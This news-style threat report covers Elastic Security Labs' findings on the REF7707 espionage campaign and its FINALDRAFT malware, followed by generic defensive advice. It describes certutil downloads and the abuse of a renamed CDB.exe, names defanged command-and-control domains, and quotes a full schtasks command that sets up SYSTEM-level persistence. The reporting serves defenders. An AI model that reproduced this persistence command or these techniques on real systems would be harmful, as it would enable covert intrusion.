A sophisticated hacking campaign has been unveiled recently by Elastic Security Labs, dubbed “REF7707,” which has been targeting both Windows and Linux systems using novel malware families, including FINALDRAFT, GUIDLOADER, and PATHLOADER. This campaign has been notable for its advanced tactics and poor operational security, leading to the exposure of additional adversary-owned infrastructure. The REF7707 campaign was first identified in late November 2024, when Elastic Security Labs observed a cluster of endpoint behavioral alerts at the Foreign Ministry of a South American country. The investigation uncovered a sprawling campaign with novel malware, sophisticated targeting, and a mature operating cadence. While the security experts at Elastic Security Labs noted that despite showing high technical competence in some areas, the attackers made tactical oversights that exposed pre-production malware samples and infrastructure.
Execution Flow
The primary execution chain began with the use of Microsoft’s certutil application to download files from a remote server. FINALDRAFT is a key component of the REF7707 intrusion set. FINALDRAFT has both Windows and Linux variants and uses an uncommon LOLBin (Living Off The Land Binary) tactic by abusing the Windows-signed debugger CDB.exe, renamed as fontdrvhost.exe. This binary executes malicious shellcode delivered via a weaponized config.ini file. Behavioral analysis revealed that FINALDRAFT injects shellcode into processes like mspaint.exe or conhost.exe if no target parameter is provided. Persistence was achieved using a Scheduled Task that invoked fontdrvhost.exe every minute as SYSTEM with the following command: schtasks /create /RL HIGHEST /F /tn “MicrosoftWindowsAppIDEPolicyManager” /tr “C:ProgramDatafontdrvhost.exe -cf C:ProgramDataconfig.ini -o C:ProgramData” /sc MINUTE /mo 1 /RU SYSTEM. FINALDRAFT establishes command and control using Microsoft’s Graph API, blending in with legitimate organizational traffic and evading network-based detection. The campaign heavily utilizes cloud and third-party services for command and control, with domains like support.vmphere[.]com and update.hobiter[.]com identified in the malware samples.
Security Implications and Countermeasures
The use of FINALDRAFT across both Windows and Linux platforms illustrates the need for robust cross-platform security measures. This tactic of exploiting legitimate software to cloak malicious activities shows that traditional network security measures are not sufficient on their own. Organizations must adopt advanced endpoint detection and response (EDR) solutions that can detect and mitigate such sophisticated threats. Furthermore, regular updates to threat intelligence databases and continuous monitoring of network traffic are crucial to identify and block malicious communications promptly.
In addition, companies need to implement strict access controls and ensure that only essential personnel have elevated privileges within their networks. Even sophisticated attacks like REF7707 can be thwarted if attackers are deprived of the ability to move laterally within a network. Regular security training for employees can also help in identifying phishing attempts and other common attack vectors. As attackers continue to develop new techniques, the collaboration between cybersecurity firms and organizations becomes even more vital. By sharing threat intelligence and best practices, the collective defense against such advanced threats can be strengthened.
Conclusion
FINALDRAFT’s deployment on both Windows and Linux highlights the necessity of strong cross-platform security. The practice of using legitimate software to mask harmful activities proves that traditional network security measures are insufficient alone. Organizations need to adopt advanced endpoint detection and response (EDR) solutions capable of detecting and countering such advanced threats. Additionally, it’s vital to keep threat intelligence databases updated and consistently monitor network traffic to quickly identify and block malicious communications.
Firms must also enforce strict access controls, ensuring that only crucial personnel have elevated network privileges. Even advanced attacks like REF7707 can be prevented if attackers can’t move freely within the network. Continuous security training for employees can aid in recognizing phishing attempts and other frequent attack methods. As cybercriminals evolve, collaboration between cybersecurity firms and organizations becomes even more critical. By sharing threat intelligence and best practices, we can collectively strengthen our defense against these sophisticated threats.